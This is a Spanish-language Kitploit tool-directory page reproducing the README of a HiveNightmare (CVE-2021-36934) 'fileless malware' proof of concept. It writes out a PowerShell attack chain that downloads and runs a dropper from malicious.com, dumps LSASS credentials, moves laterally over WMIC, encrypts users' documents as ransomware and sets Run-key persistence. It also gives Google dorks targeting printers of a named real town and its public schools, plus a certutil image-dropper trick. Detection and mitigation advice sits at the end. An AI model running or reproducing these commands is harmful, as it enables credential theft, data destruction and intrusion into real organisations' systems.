Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Why-so-Serious-SAM — Malware PoC que utiliza el exploit CVE-2021-36934 (ACL inadecuadas en copias de sombra) mediante un método de red team sin archivos en Windows 10/11 con LOLBins, extrayendo los hives SYSTEM y SAM para obtener hashes NTLM locales. | Kitploit
Herramientas/GitHubGitHub/p1rat3r00t/why-so-serious-sam
Escalada de PrivilegiosExplotaciónMovimiento LateralPost-ExplotaciónCTFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

Malware PoC que utiliza el exploit CVE-2021-36934 (ACL inadecuadas en copias de sombra) mediante un método de red team sin archivos en Windows 10/11 con LOLBins, extrayendo los hives SYSTEM y SAM para obtener hashes NTLM locales.

Ver RepositorioSitio web
1hace 1 añoAún no revisado

PoC del exploit 'Fileless' de HiveNightmare:

Screenshot 2025-05-21 001453


Tabla de contenidos

  • Overview
  • Features
  • Lab Simulation Example
  • Reconnaissance with Google Dorks
  • LOLBins Overview
  • Fileless Dropper Embedding
  • Exploiting Print Spooler & HiveNightmare
  • Reflective DLL Injection
  • MITRE ATT&CK Mapping
  • Detection & Mitigation
  • Legal Disclaimer
  • References & Further Reading

Descripción general

CVE-2021-36934/HiveNightmare es un proyecto educativo de investigación para equipos rojo/púrpura que simula un marco de ataque de malware sin archivos en Windows 11. Permite emular kill chains de adversarios reales utilizando técnicas de MITRE ATT&CK, con un enfoque en operaciones sigilosas y sin archivos.

Advertencia: Solo para investigación y entrenamiento en laboratorios aislados. No lo utilice en sistemas de producción o no autorizados.


Características

  • Simula ataques de ransomware/wiperware sin archivos de extremo a extremo
  • Demuestra el uso de binarios Living Off the Land (LOLBins)
  • Muestra acceso a credenciales, escalada de privilegios, movimiento lateral y persistencia
  • Contiene ejemplos prácticos de laboratorio y reconocimiento
  • Se alinea con MITRE ATT&CK para ejercicios de detección del equipo azul

Ejemplo de simulación de laboratorio

La siguiente simulación de PowerShell demuestra una cadena de ataque típica de ransomware sin archivos utilizando herramientas integradas de Windows (LOLBins):

root@kitploit:~
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Reconocimiento con Google Dorks

Objetivo de ejemplo: Identificar servicios de impresión expuestos públicamente en Moberly, Misuri, potencialmente vulnerables a exploits como PrintNightmare.

Consultas de muestra con Google Dorks:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

Resumen de LOLBins

Los binarios Living Off the Land (LOLBins) son binarios legítimos y confiables de Windows que los adversarios suelen abusar para evadir controles de seguridad y ejecutar código malicioso sin archivos.

Ejemplo de uso (ataque al servicio de impresión):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

Los atacantes utilizan LOLBins como rundll32.exe, regsvr32.exe y powershell.exe para ejecutar payloads desde recursos compartidos de red, a menudo después de identificar impresoras o servidores expuestos mediante reconocimiento.


Incrustación de un dropper sin archivos

Objetivo: Entregar payloads de forma encubierta incrustando archivos dentro de imágenes y extrayéndolos con herramientas nativas.

Pasos:

  1. Incrustar el payload:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. Extraer y decodificar:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

Este método evita el filtrado tradicional de extensiones de archivo y aprovecha las herramientas integradas para una entrega evasiva.


Inyección de DLL reflectante

Técnica: Cargar y ejecutar una DLL maliciosa directamente en memoria mediante carga reflectante.

Ejemplo:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

Esto permite una ejecución sigilosa en memoria sin dejar artefactos en el disco.


Mapeo MITRE ATT&CK


Detección y Mitigación

Detección

  • Sysmon + reglas Sigma:

    • Monitorear rundll32.exe cargando DLLs que no son del sistema
    • Vigilar el uso anormal de certutil.exe, regsvr32.exe, mshta.exe
    • Rastrear el acceso a volúmenes shadow por parte de usuarios sin privilegios
  • Ejemplos SIEM (ELK/Splunk):

    • Alertas sobre ejecución desde recursos compartidos públicos
    • Anomalías de procesos padre/hijo (p. ej., explorer.exe lanzando rundll32.exe)
    • Comandos codificados sospechosos en PowerShell o CMD

Mitigación

  • Deshabilitar Print Spooler donde no sea necesario:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • Aplicar todos los parches de seguridad y endurecer las ACL
  • Bloquear o restringir los LOLBins con AppLocker o WDAC
  • Usar soluciones EDR que detecten carga reflectante de DLL y ataques en memoria

Aviso Legal

Todo el contenido, código y técnicas de este repositorio son solo para fines educativos y de pruebas de penetración autorizadas. No utilice ninguna parte de este proyecto fuera de entornos controlados y aislados y sin permiso explícito. Los autores no asumen ninguna responsabilidad por el mal uso.


Referencias y Lecturas Adicionales

  • LOLOL Farm – Parque de juegos de LOLBin
  • LOLGEN – Genera cadenas de LOLBin
  • Detectando SeriousSam
  • Introducción a la inyección de DLL
  • Cadena de explotación de Print Spooler
  • Malware sin archivos – Wikipedia
  • PrintSpoofer (original)
  • HiveNightmare
  • MITRE ATT&CK T1055
  • Demo de HiveNightmare

Manténgase seguro, investigue de manera responsable y úselo siempre de forma legal y ética.

Descargar herramienta
FaseTécnicaIDDescripción
Acceso InicialValid Accounts / Drive-by CompromiseT1078, T1189Compromiso de interfaces de impresión expuestas al público
EjecuciónDLL Side-Loading / LOLBinsT1218, T1055.001Ejecución de DLLs reflectivamente mediante binarios confiables
Escalada de PrivilegiosPrint Spooler Exploits / Hive ACL AbuseT1068, T1003.002Acceso a nivel de SYSTEM y extracción de hashes SAM
Evasión de DefensasFileless Execution / Obfuscated FilesT1027, T1202Payloads codificados entregados mediante certutil, mshta, etc.
Acceso a CredencialesLSASS Dumping / SAM Hive AccessT1003Volcado de credenciales tras HiveNightmare
Movimiento LateralSMB/Net Share EnumerationT1021.002Propagación mediante recursos compartidos de impresora o enumeración del spooler
ImpactoData Destruction / EncryptionT1485, T1486Wiperware sin archivos activado mediante payloads DLL